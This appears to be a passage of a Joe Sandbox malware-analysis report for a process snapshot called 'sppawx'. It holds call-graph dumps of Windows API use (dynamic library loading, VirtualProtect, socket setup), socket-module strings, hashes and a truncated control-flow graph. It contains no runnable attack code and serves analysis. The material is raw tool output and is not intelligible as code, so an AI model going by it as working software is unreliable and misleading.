7ff79a319400 2 API calls 41403->41404 41405 7ff79a318a49 GetEnvironmentVariableW 41404->41405 41406 7ff79a318ab2 41405->41406 41407 7ff79a318a66 ExpandEnvironmentStringsW 41405->41407 41408 7ff79a31c5c0 _log10_special 8 API calls 41406->41408 41407->41406 41409 7ff79a318a88 41407->41409 41411 7ff79a318ac4 41408->41411 41488 7ff79a3194b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 41409->41488 41411->41198 41412 7ff79a318a9a 41413 7ff79a31c5c0 _log10_special 8 API calls 41412->41413 41414 7ff79a318aaa 41413->41414 41414->41198 41489 7ff79a316350 41415->41489 41418 7ff79a313399 41460 7ff79a313670 FreeLibrary 41418->41460 41420 7ff79a313381 41420->41418 41557 7ff79a316040 41420->41557 41422 7ff79a31338d 41422->41418 41566 7ff79a3161d0 54 API calls 41422->41566 41424->41207 41426 7ff79a317fa4 41425->41426 41427 7ff79a320744 73 API calls 41426->41427 41432 7ff79a31807b __vcrt_freefls 41426->41432 41428 7ff79a317fc0 41427->41428 41428->41432 41620 7ff79a327938 41428->41620 41430 7ff79a320744 73 API calls 41433 7ff79a317fd5 41430->41433 41431 7ff79a32040c _fread_nolock 53 API calls 41431->41433 41432->41200 41433->41430 41433->41431 41433->41432 41434->41184 41435->41184 41436->41210 41437->41213 41438->41218 41439->41221 41440->41233 41441->41184 41442->41239 41443->41184 41444->41252 41445->41184 41446->41237 41448 7ff79a311c80 49 API calls 41447->41448 41449 7ff79a314650 41448->41449 41449->41257 41450->41289 41451->41293 41452->41296 41453->41301 41454->41308 41455->41300 41456->41305 41457->41305 41458->41270 41460->41283 41461->41288 41462->41329 41463->41329 41465 7ff79a3136bc GetModuleFileNameW 41464->41465 41465->41333 41465->41334 41467 7ff79a31932f FindClose 41466->41467 41468 7ff79a319342 41466->41468 41467->41468 41469 7ff79a31c5c0 _log10_special 8 API calls 41468->41469 41470 7ff79a31371a 41469->41470 41470->41338 41470->41339 41471->41346 41472->41345 41473->41351 41474->41343 41475->41346 41476->41367 41477->41401 41478->41373 41479->41401 41480->41379 41481->41401 41482->41390 41483->41401 41484->41398 41485->41401 41486->41397 41487->41401 41488->41412 41490 7ff79a316365 41489->41490 41491 7ff79a311c80 49 API calls 41490->41491 41492 7ff79a3163a1 41491->41492 41493 7ff79a3163aa 41492->41493 41494 7ff79a3163cd 41492->41494 41577 7ff79a312710 54 API calls _log10_special 41493->41577 41496 7ff79a314620 49 API calls 41494->41496 41497 7ff79a3163e5 41496->41497 41498 7ff79a316403 41497->41498 41578 7ff79a312710 54 API calls _log10_special 41497->41578 41567 7ff79a314550 41498->41567 41499 7ff79a31c5c0 _log10_special 8 API calls 41502 7ff79a31336e 41499->41502 41502->41418 41520 7ff79a3164f0 41502->41520 41504 7ff79a31641b 41505 7ff79a314620 49 API calls 41504->41505 41507 7ff79a316434 41505->41507 41506 7ff79a319070 3 API calls 41506->41504 41508 7ff79a316459 41507->41508 41509 7ff79a316439 41507->41509 41573 7ff79a319070 41508->41573 41579 7ff79a312710 54 API calls _log10_special 41509->41579 41512 7ff79a3163c3 41512->41499 41513 7ff79a316466 41514 7ff79a3164b1 41513->41514 41515 7ff79a316472 41513->41515 41581 7ff79a315820 137 API calls 41514->41581 41516 7ff79a319400 2 API calls 41515->41516 41518 7ff79a31648a GetLastError 41516->41518 41580 7ff79a312c50 51 API calls _log10_special 41518->41580 41582 7ff79a3153f0 41520->41582 41522 7ff79a316516 41523 7ff79a31651e 41522->41523 41524 7ff79a31652f 41522->41524 41607 7ff79a312710 54 API calls _log10_special 41523->41607 41589 7ff79a314c80 41524->41589 41528 7ff79a31653b 41608 7ff79a312710 54 API calls _log10_special 41528->41608 41529 7ff79a31654c 41532 7ff79a31655c 41529->41532 41534 7ff79a31656d 41529->41534 41531 7ff79a31652a 41531->41420 41609 7ff79a312710 54 API calls _log10_special 41532->41609 41535 7ff79a31658c 41534->41535 41536 7ff79a31659d 41534->41536 41610 7ff79a312710 54 API calls _log10_special 41535->41610 41538 7ff79a3165ac 41536->41538 41539 7ff79a3165bd 41536->41539 41611 7ff79a312710 54 API calls _log10_special 41538->41611 41593 7ff79a314d40 41539->41593 41543 7ff79a3165cc 41612 7ff79a312710 54 API calls _log10_special 41543->41612 41544 7ff79a3165dd 41546 7ff79a3165ec 41544->41546 41548 7ff79a3165fd 41544->41548 41613 7ff79a312710 54 API calls _log10_special 41546->41613 41549 7ff79a31660f 41548->41549 41551 7ff79a316620 41548->41551 41614 7ff79a312710 54 API calls _log10_special 41549->41614 41554 7ff79a31664a 41551->41554 41615 7ff79a327320 73 API calls 41551->41615 41553 7ff79a316638 41616 7ff79a327320 73 API calls 41553->41616 41554->41531 41617 7ff79a312710 54 API calls _log10_special 41554->41617 41558 7ff79a316060 41557->41558 41558->41558 41559 7ff79a316089 41558->41559 41565 7ff79a3160a0 __vcrt_freefls 41558->41565 41619 7ff79a312710 54 API calls _log10_special 41559->41619 41561 7ff79a316095 41561->41422 41562 7ff79a3161ab 41562->41422 41563 7ff79a311470 116 API calls 41563->41565 41564 7ff79a312710 54 API calls 41564->41565 41565->41562 41565->41563 41565->41564 41566->41418 41568 7ff79a31455a 41567->41568 41569 7ff79a319400 2 API calls 41568->41569 41570 7ff79a31457f 41569->41570 41571 7ff79a31c5c0 _log10_special 8 API calls 41570->41571 41572 7ff79a3145a7 41571->41572 41572->41504 41572->41506 41574 7ff79a319400 2 API calls 41573->41574 41575 7ff79a319084 LoadLibraryExW 41574->41575 41576 7ff79a3190a3 __vcrt_freefls 41575->41576 41576->41513 41577->41512 41578->41498 41579->41512 41580->41512 41581->41512 41584 7ff79a31541c 41582->41584 41583 7ff79a315424 41583->41522 41584->41583 41587 7ff79a3155c4 41584->41587 41618 7ff79a326b14 48 API calls 41584->41618 41585 7ff79a315787 __vcrt_freefls 41585->41522 41586 7ff79a3147c0 47 API calls 41586->41587 41587->41585 41587->41586 41590 7ff79a314cb0 41589->41590 41591 7ff79a31c5c0 _log10_special 8 API calls 41590->41591 41592 7ff79a314d1a 41591->41592 41592->41528 41592->41529 41594 7ff79a314d55 41593->41594 41595 7ff79a311c80 49 API calls 41594->41595 41596 7ff79a314da1 41595->41596 41597 7ff79a311c80 49 API calls 41596->41597 41606 7ff79a314e23 __vcrt_freefls 41596->41606 41599 7ff79a314de0 41597->41599 41598 7ff79a31c5c0 _log10_special 8 API calls 41600 7ff79a314e6e 41598->41600 41601 7ff79a319400 2 API calls 41599->41601 41599->41606 41600->41543 41600->41544 41602 7ff79a314df6 41601->41602 41603 7ff79a319400 2 API calls 41602->41603 41604 7ff79a314e0d 41603->41604 41605 7ff79a319400 2 API calls 41604->41605 41605->41606 41606->41598 41607->41531 41608->41531 41609->41531 41610->41531 41611->41531 41612->41531 41613->41531 41614->41531 41615->41553 41616->41554 41617->41531 41618->41584 41619->41561 41621 7ff79a327968 41620->41621 41624 7ff79a327444 41621->41624 41623 7ff79a327981 41623->41433 41625 7ff79a32748e 41624->41625 41626 7ff79a32745f 41624->41626 41634 7ff79a3254dc EnterCriticalSection 41625->41634 41635 7ff79a32a884 37 API calls 2 library calls 41626->41635 41629 7ff79a32747f 41629->41623 41630 7ff79a327493 41631 7ff79a3274b0 38 API calls 41630->41631 41632 7ff79a32749f 41631->41632 41633 7ff79a3254e8 _fread_nolock LeaveCriticalSection 41632->41633 41633->41629 41635->41629 41645 7ffedccb7200 41646 7ffedccb7de0 41645->41646 41653 7ffedccb7218 41645->41653 41647 7ffedccb7d03 LoadLibraryA 41648 7ffedccb7d1d 41647->41648 41650 7ffedccb7d26 GetProcAddress 41648->41650 41648->41653 41650->41648 41652 7ffedccb7d47 41650->41652 41651 7ffedccb7d52 VirtualProtect VirtualProtect 41651->41646 41653->41647 41653->41651 41654 7ffedd2bfd60 41655 7ffedd2bfd89 41654->41655 41656 7ffedd2bfdc5 00007FFEF5CE19C0 41655->41656 41657 7ffedd2bfded 41655->41657 41656->41657 41658 7ffedd276de8 41659 7ffedd276dfb 41658->41659 41660 7ffedd276e18 41659->41660 41662 7ffedd27466c 41659->41662 41663 7ffedd279548 41662->41663 41664 7ffedd274686 ioctlsocket 41663->41664 41665 7ffedd2746b2 41664->41665 41666 7ffedd2746bc 41664->41666 41665->41660 41667 7ffedd2746c2 WSAGetLastError 41666->41667 41667->41665 41668 7ffedd276c68 41671 7ffedd276c9e 41668->41671 41669 7ffedd276ca2 setsockopt 41674 7ffedd276d6b 41669->41674 41671->41669 41672 7ffedd276d2a 41671->41672 41673 7ffedd276d97 setsockopt 41672->41673 41672->41674 41673->41674 41675 7ffedcbf14ec 41677 7ffedcc37d30 41675->41677 41676 7ffedcc37ef0 SetLastError 41676->41677 41678 7ffedcc37e24 41676->41678 41677->41676 41677->41678 41679 7ffedd2cbf19 41680 7ffedd2cbf28 41679->41680 41682 7ffedd2c97b7 41680->41682 41683 7ffedd2b1fa0 41680->41683 41686 7ffedd2b1fd7 41683->41686 41684 7ffedd2b2039 41684->41682 41686->41684 41687 7ffedd2b1b80 41686->41687 41692 7ffedd2a8cf0 41687->41692 41689 7ffedd2b1b91 41690 7ffedd2b1bb1 41689->41690 41691 7ffedd2a90d0 3 API calls 41689->41691 41690->41686 41691->41690 41693 7ffedd2a8d7d 41692->41693 41694 7ffedd2a8d20 41692->41694 41693->41689 41694->41693 41695 7ffedd29c960 2 API calls 41694->41695 41695->41693 41696 7ffedd2b0a50 41697 7ffedd2b0a9c 41696->41697 41698 7ffedd2b0aae 00007FFEFBBD5630 41697->41698 41702 7ffedd2b0ac1 41697->41702 41698->41702 41700 7ffedd2b0e77 41701 7ffedd2b0bd2 41700->41701 41703 7ffedd29c960 2 API calls 41700->41703 41702->41701 41704 7ffedd2a8290 41702->41704 41703->41701 41706 7ffedd2a8321 41704->41706 41705 7ffedd2a83d2 00007FFEF5CE19C0 41707 7ffedd2a843c 41705->41707 41706->41705 41706->41706 41708 7ffedd2a85b3 41706->41708 41707->41708 41710 7ffedd29ef40 41707->41710 41708->41700 41712 7ffedd29ef91 41710->41712 41711 7ffedd29f160 CreateFileW 41711->41712 41712->41711 41713 7ffedd29f318 41712->41713 41713->41708 41714 7ffedd238c98 41716 7ffedd238ca0 41714->41716 41717 7ffedd238ce5 41716->41717 41719 7ffedd234a34 WSAGetLastError 41716->41719 41720 7ffedd234324 41716->41720 41719->41716 41721 7ffedd234363 41720->41721 41724 7ffedd234358 41720->41724 41726 7ffedd232680 41721->41726 41723 7ffedd234403 41723->41716 41724->41721 41725 7ffedd2343d4 select 41724->41725 41725->41721 41727 7ffedd232689 41726->41727 41728 7ffedd232694 41727->41728 41729 7ffedd2326d4 IsProcessorFeaturePresent 41727->41729 41728->41723 41730 7ffedd2326ec 41729->41730 41733 7ffedd2328c8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41730->41733 41732 7ffedd2326ff 41732->41723 41733->41732 41734 7ffedd275958 41737 7ffedd275992 41734->41737 41736 7ffedd275a90 41765 7ffedd272a50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 41736->41765 41737->41736 41740 7ffedd275ab8 41737->41740 41739 7ffedd275aa4 41743 7ffedd275b02 41740->41743 41741 7ffedd275b57 41746 7ffedd275d2a 41741->41746 41753 7ffedd275b6b 41741->41753 41742 7ffedd275e02 41747 7ffedd275e31 WSASocketW 41742->41747 41743->41741 41743->41742 41745 7ffedd275b75 41743->41745 41766 7ffedd272a50 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 41745->41766 41746->41745 41750 7ffedd275d81 getsockname 41746->41750 41749 7ffedd275e5e 41747->41749 41748 7ffedd275ba7 41748->41736 41754 7ffedd275cdc 41749->41754 41755 7ffedd275d0e 41749->41755 41751 7ffedd275da4 41750->41751 41752 7ffedd275d98 41750->41752 41751->41754 41756 7ffedd275dad WSAGetLastError 41751->41756 41752->41755 41760 7ffedd275dc4 getsockopt 41752->41760 41753->41745 41757 7ffedd275c9e WSASocketW 41753->41757 41767 7ffedd274a40 WSAGetLastError 41754->41767 41768 7ffedd2743d0 ioctlsocket WSAGetLastError 41755->41768 41756->41752 41756->41754 41761 7ffedd275cd6 41757->41761 41760->41754 41760->41755 41761->41754 41763 7ffedd275ce6 SetHandleInformation 41761->41763 41762 7ffedd275d00 closesocket 41762->41745 41763->41755 41764 7ffedd275cf8 41763->41764 41764->41745 41764->41762 41765->41739 41766->41748 41767->41745 41768->41764 41769 7ffedd239d00 41770 7ffedd239d2f 41769->41770 41771 7ffedd239d55 41770->41771 41773 7ffedd239db0 41770->41773 41775 7ffedd239de2 41773->41775 41774 7ffedd234324 5 API calls 41777 7ffedd239eac 41774->41777 41775->41774 41779 7ffedd239e03 41775->41779 41778 7ffedd234324 5 API calls 41777->41778 41777->41779 41780 7ffedd234a34 WSAGetLastError 41777->41780 41778->41777 41779->41771 41780->41777 41781 7ff79a31bb50 41782 7ff79a31bb7e 41781->41782 41783 7ff79a31bb65 41781->41783 41783->41782 41786 7ff79a32d66c 41783->41786 41787 7ff79a32d6b7 41786->41787 41788 7ff79a32d67b _get_daylight 41786->41788 41794 7ff79a324f78 11 API calls _get_daylight 41787->41794 41788->41787 41789 7ff79a32d69e HeapAlloc 41788->41789 41793 7ff79a333600 EnterCriticalSection LeaveCriticalSection _get_daylight 41788->41793 41789->41788 41791 7ff79a31bbde 41789->41791 41793->41788 41794->41791 41795 7ffedd2b41c0 41796 7ffedd2b4204 41795->41796 41798 7ffedd2b41d0 41795->41798 41797 7ffedd2b06a0 3 API calls 41796->41797 41799 7ffedd2b4253 41797->41799 41800 7ffedd2a0180 GetSystemInfo 41801 7ffedd2a01b4 41800->41801 41802 7ffedd2edd00 41803 7ffedd2edd2c 41802->41803 41805 7ffedd2edd31 41802->41805 41806 7ffedd311540 41803->41806 41807 7ffedd311565 41806->41807 41808 7ffedd311559 41806->41808 41807->41805 41810 7ffedd311470 41808->41810 41811 7ffedd3114aa 41810->41811 41814 7ffedd3114b7 41810->41814 41816 7ffedd310fb0 41811->41816 41812 7ffedd31150d 41812->41807 41814->41812 41815 7ffedd310fb0 4 API calls 41814->41815 41815->41814 41823 7ffedd310cb0 41816->41823 41818 7ffedd31106c 41819 7ffedd2b1fa0 3 API calls 41818->41819 41820 7ffedd311097 41818->41820 41821 7ffedd3110e1 41818->41821 41819->41821 41820->41814 41821->41820 41827 7ffedd309a70 41821->41827 41824 7ffedd310cdb 41823->41824 41826 7ffedd310cd2 41823->41826 41824->41818 41826->41824 41833 7ffedd311850 00007FFEF5CE19C0 41826->41833 41830 7ffedd309a9d 41827->41830 41831 7ffedd309aa6 41827->41831 41830->41820 41831->41830 41832 7ffedd310cb0 4 API calls 41831->41832 41837 7ffedd311df0 41831->41837 41841 7ffedd2c6b10 41831->41841 41832->41831 41834 7ffedd31192b 41833->41834 41836 7ffedd311949 41833->41836 41834->41824 41835 7ffedd2b1fa0 3 API calls 41835->41836 41836->41834 41836->41835 41839 7ffedd311e28 41837->41839 41840 7ffedd311e7e 41837->41840 41838 7ffedd311850 4 API calls 41838->41840 41839->41831 41840->41838 41840->41839 41843 7ffedd2c6b3c 41841->41843 41844 7ffedd2c6b2b 41841->41844 41842 7ffedd311df0 4 API calls 41842->41843 41843->41842 41843->41844 41844->41831 41845 7ffedd23940c 41847 7ffedd239441 41845->41847 41846 7ffedd239451 41847->41846 41849 7ffedd2394f8 41847->41849 41852 7ffedd239531 41849->41852 41850 7ffedd23954d 41850->41846 41852->41850 41853 7ffedd234324 5 API calls 41852->41853 41854 7ffedd234a34 WSAGetLastError 41852->41854 41853->41852 41854->41852 41855 7ffedcbff3f0 41856 7ffedcbf132a 41855->41856 41857 7ffedcbff410 SetLastError 41856->41857 41858 7ffedcbff430 41857->41858
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F380Startup
                                                                                                                                                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                              • API String ID: 106476611-1188461360
                                                                                                                                                                                                                              • Opcode ID: 0aedc31c3f32929b62878f280f06a405182aa824222a02ced28cf02c4fa19bcf
                                                                                                                                                                                                                              • Instruction ID: ad890c62f1dc0f8ca6c86992a0937b892f463a99c539947d91709f13ec5e616b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aedc31c3f32929b62878f280f06a405182aa824222a02ced28cf02c4fa19bcf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8BC2C760F18763A1F630DB26AC146AD2775BF86BE1F485437C90E86A74FE6EE205D310

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 592 7ff79a311000-7ff79a313806 call 7ff79a31fe88 call 7ff79a31fe90 call 7ff79a31c8c0 call 7ff79a325460 call 7ff79a3254f4 call 7ff79a3136b0 606 7ff79a313808-7ff79a31380f 592->606 607 7ff79a313814-7ff79a313836 call 7ff79a311950 592->607 608 7ff79a313c97-7ff79a313cb2 call 7ff79a31c5c0 606->608 612 7ff79a31391b-7ff79a313931 call 7ff79a3145b0 607->612 613 7ff79a31383c-7ff79a313856 call 7ff79a311c80 607->613 620 7ff79a31396a-7ff79a31397f call 7ff79a312710 612->620 621 7ff79a313933-7ff79a313960 call 7ff79a317f80 612->621 617 7ff79a31385b-7ff79a31389b call 7ff79a318a20 613->617 626 7ff79a31389d-7ff79a3138a3 617->626 627 7ff79a3138c1-7ff79a3138cc call 7ff79a324fa0 617->627 629 7ff79a313c8f 620->629 633 7ff79a313962-7ff79a313965 call 7ff79a3200bc 621->633 634 7ff79a313984-7ff79a3139a6 call 7ff79a311c80 621->634 630 7ff79a3138af-7ff79a3138bd call 7ff79a318b90 626->630 631 7ff79a3138a5-7ff79a3138ad 626->631 641 7ff79a3139fc-7ff79a313a2a call 7ff79a318b30 call 7ff79a318b90 * 3 627->641 642 7ff79a3138d2-7ff79a3138e1 call 7ff79a318a20 627->642 629->608 630->627 631->630 633->620 643 7ff79a3139b0-7ff79a3139b9 634->643 668 7ff79a313a2f-7ff79a313a3e call 7ff79a318a20 641->668 649 7ff79a3138e7-7ff79a3138ed 642->649 650 7ff79a3139f4-7ff79a3139f7 call 7ff79a324fa0 642->650 643->643 647 7ff79a3139bb-7ff79a3139d8 call 7ff79a311950 643->647 647->617 660 7ff79a3139de-7ff79a3139ef call 7ff79a312710 647->660 653 7ff79a3138f0-7ff79a3138fc 649->653 650->641 657 7ff79a3138fe-7ff79a313903 653->657 658 7ff79a313905-7ff79a313908 653->658 657->653 657->658 658->650 661 7ff79a31390e-7ff79a313916 call 7ff79a324fa0 658->661 660->629 661->668 671 7ff79a313a44-7ff79a313a47 668->671 672 7ff79a313b45-7ff79a313b53 668->672 671->672 675 7ff79a313a4d-7ff79a313a50 671->675 673 7ff79a313a67 672->673 674 7ff79a313b59-7ff79a313b5d 672->674 676 7ff79a313a6b-7ff79a313a90 call 7ff79a324fa0 673->676 674->676 677 7ff79a313b14-7ff79a313b17 675->677 678 7ff79a313a56-7ff79a313a5a 675->678 687 7ff79a313aab-7ff79a313ac0 676->687 688 7ff79a313a92-7ff79a313aa6 call 7ff79a318b30 676->688 680 7ff79a313b19-7ff79a313b1d 677->680 681 7ff79a313b2f-7ff79a313b40 call 7ff79a312710 677->681 678->677 679 7ff79a313a60 678->679 679->673 680->681 685 7ff79a313b1f-7ff79a313b2a 680->685 689 7ff79a313c7f-7ff79a313c87 681->689 685->676 691 7ff79a313be8-7ff79a313bfa call 7ff79a318a20 687->691 692 7ff79a313ac6-7ff79a313aca 687->692 688->687 689->629 700 7ff79a313bfc-7ff79a313c02 691->700 701 7ff79a313c2e 691->701 694 7ff79a313bcd-7ff79a313be2 call 7ff79a311940 692->694 695 7ff79a313ad0-7ff79a313ae8 call 7ff79a3252c0 692->695 694->691 694->692 705 7ff79a313aea-7ff79a313b02 call 7ff79a3252c0 695->705 706 7ff79a313b62-7ff79a313b7a call 7ff79a3252c0 695->706 703 7ff79a313c1e-7ff79a313c2c 700->703 704 7ff79a313c04-7ff79a313c1c 700->704 707 7ff79a313c31-7ff79a313c40 call 7ff79a324fa0 701->707 703->707 704->707 705->694 716 7ff79a313b08-7ff79a313b0f 705->716 714 7ff79a313b87-7ff79a313b9f call 7ff79a3252c0 706->714 715 7ff79a313b7c-7ff79a313b80 706->715 717 7ff79a313d41-7ff79a313d63 call 7ff79a3144d0 707->717 718 7ff79a313c46-7ff79a313c4a 707->718 731 7ff79a313bac-7ff79a313bc4 call 7ff79a3252c0 714->731 732 7ff79a313ba1-7ff79a313ba5 714->732 715->714 716->694 729 7ff79a313d71-7ff79a313d82 call 7ff79a311c80 717->729 730 7ff79a313d65-7ff79a313d6f call 7ff79a314620 717->730 721 7ff79a313c50-7ff79a313c5f call 7ff79a3190e0 718->721 722 7ff79a313cd4-7ff79a313ce6 call 7ff79a318a20 718->722 733 7ff79a313c61 721->733 734 7ff79a313cb3-7ff79a313cbd call 7ff79a318850 721->734 735 7ff79a313ce8-7ff79a313ceb 722->735 736 7ff79a313d35-7ff79a313d3c 722->736 743 7ff79a313d87-7ff79a313d96 729->743 730->743 731->694 751 7ff79a313bc6 731->751 732->731 740 7ff79a313c68 call 7ff79a312710 733->740 756 7ff79a313cc8-7ff79a313ccf 734->756 757 7ff79a313cbf-7ff79a313cc6 734->757 735->736 741 7ff79a313ced-7ff79a313d10 call 7ff79a311c80 735->741 736->740 752 7ff79a313c6d-7ff79a313c77 740->752 758 7ff79a313d2b-7ff79a313d33 call 7ff79a324fa0 741->758 759 7ff79a313d12-7ff79a313d26 call 7ff79a312710 call 7ff79a324fa0 741->759 748 7ff79a313d98-7ff79a313d9f 743->748 749 7ff79a313dc4-7ff79a313dda call 7ff79a319400 743->749 748->749 754 7ff79a313da1-7ff79a313da5 748->754 764 7ff79a313de8-7ff79a313e04 SetDllDirectoryW 749->764 765 7ff79a313ddc 749->765 751->694 752->689 754->749 760 7ff79a313da7-7ff79a313dbe SetDllDirectoryW LoadLibraryExW 754->760 756->743 757->740 758->743 759->752 760->749 766 7ff79a313e0a-7ff79a313e19 call 7ff79a318a20 764->766 767 7ff79a313f01-7ff79a313f08 764->767 765->764 780 7ff79a313e1b-7ff79a313e21 766->780 781 7ff79a313e32-7ff79a313e3c call 7ff79a324fa0 766->781 772 7ff79a313ffc-7ff79a314004 767->772 773 7ff79a313f0e-7ff79a313f15 767->773 777 7ff79a314029-7ff79a314034 call 7ff79a3136a0 call 7ff79a313360 772->777 778 7ff79a314006-7ff79a314023 PostMessageW GetMessageW 772->778 773->772 776 7ff79a313f1b-7ff79a313f25 call 7ff79a3133c0 773->776 776->752 788 7ff79a313f2b-7ff79a313f3f call 7ff79a3190c0 776->788 792 7ff79a314039-7ff79a31405b call 7ff79a313670 call 7ff79a316fb0 call 7ff79a316d60 777->792 778->777 784 7ff79a313e2d-7ff79a313e2f 780->784 785 7ff79a313e23-7ff79a313e2b 780->785 793 7ff79a313ef2-7ff79a313efc call 7ff79a318b30 781->793 794 7ff79a313e42-7ff79a313e48 781->794 784->781 785->784 799 7ff79a313f41-7ff79a313f5e PostMessageW GetMessageW 788->799 800 7ff79a313f64-7ff79a313fa7 call 7ff79a318b30 call 7ff79a318bd0 call 7ff79a316fb0 call 7ff79a316d60 call 7ff79a318ad0 788->800 793->767 794->793 798 7ff79a313e4e-7ff79a313e54 794->798 802 7ff79a313e5f-7ff79a313e61 798->802 803 7ff79a313e56-7ff79a313e58 798->803 799->800 841 7ff79a313fe9-7ff79a313ff7 call 7ff79a311900 800->841 842 7ff79a313fa9-7ff79a313fb3 call 7ff79a319200 800->842 802->767 806 7ff79a313e67-7ff79a313e83 call 7ff79a316db0 call 7ff79a317330 802->806 803->806 807 